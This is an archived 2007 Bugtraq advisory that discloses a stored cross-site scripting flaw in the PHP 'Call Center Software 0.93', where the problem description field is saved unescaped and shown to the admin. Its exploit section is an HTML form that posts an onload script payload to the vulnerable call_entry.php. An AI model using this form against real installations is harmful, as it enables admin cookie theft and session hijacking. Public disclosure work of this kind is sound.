lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070221192347.20208.qmail@securityfocus.com>
Date: 21 Feb 2007 19:23:47 -0000
From: corrado.liotta@...ce.it
To: bugtraq@...urityfocus.com
Subject: Call Center Software - Remote Xss Post Exploit -

-=[--------------------ADVISORY-------------------]=-
                                              
                       Call center 0,93
                                               
  Author: CorryL    [corryl80@...il.com]   
-=[-----------------------------------------------]=-


-=[+] Application:    Call senter
-=[+] Version:        0,93
-=[+] Vendor's URL:   http://www.call-center-software.org/ 
-=[+] Platform:       Windows\Linux\Unix
-=[+] Bug type:       Cross-Site Script
-=[+] Exploitation:   Remote
-=[-]
-=[+] Author:           CorryL  ~ corryl80[at]gmail[dot]com ~
-=[+] Reference:       www.xoned.net 
-=[+] Virtual Office:  http://www.kasamba.com/CorryL
-=[+] Irc Chan:         irc.darksin.net #x0n3-h4ck        


..::[ Descriprion ]::..

Call center software is one of the most important aspects of any call help center, 
being able to track and manage calls can be the key to high customer safisfacation. 
Our 100% free call center software solution is based on php and the mysql database.


..::[ Bug ]::..

An attacker exploiting this vulnerability is able steal the content
the cookies of the consumer admin in fact the bug situated is on an request post
then he remains memorized inside the database in attends him that the admin
goes to read the content of the call

..::[Exploit]::..

<html>
<head>
<title>Call Center</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel="stylesheet" href="helpdesk.css" type="text/css">
</head>

<body>
<table bgcolor="#FFFFFF" width="100%">
	<tr>
		<td align="center">
			<form method="post" action="http://remote_server/path/call_entry.php">
			<table border="0">
				<tr>
					<th class="ttitle">Adding Call</th>
				</tr>
				<tr>
					<td>
						<table width="100%" border="0" cellspacing="0" cellpadding="3">
													<tr>
								<td align="right">Name:&nbsp;</td><td align="left"><input type="text" name="name" Value="H4ck3r"size="30"></td>
							</tr>
							<tr>
								<td align="right">Phone:&nbsp;</td><td align="left"><input type="text" name="phone" value="111-555-555" size="20"></td>
							</tr>
							<tr>
								<td align="right">Department:&nbsp;</td>
								<td>
									<select name="department_id">
																																                                                                <option value="1">Problem</option>
																</select>
								</td>
							</tr>
							<tr>
								<td align="right">Issue Type:&nbsp;</td>
								<td>
									<select name="issue_id">
																	<option value="6">email</option>
																	<option value="2">keyboard</option>
																	<option value="3">monitor</option>
																	<option value="5">mouse</option>
																	<option value="4">network</option>
																	<option value="8">password</option>
																	<option value="7">word processing</option>
																</select>
								</td>
							</tr>
							<tr>
								<td align="right" valign="top">Xss Script Here :&nbsp;</td>
								<td align="left"><input type="text" name="problem_desc" value="<body onload=alert(1395499912)>" size="50"></td>
							</tr>
							<tr>
								<td>&nbsp;</td><td><input type="submit" name="submit" value="Add" class="button"></td>
							</tr>
						</table>
					</td>
				</tr>
			</table>
			</form>
		</td>
	</tr>	
</table>
</body>
</html>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ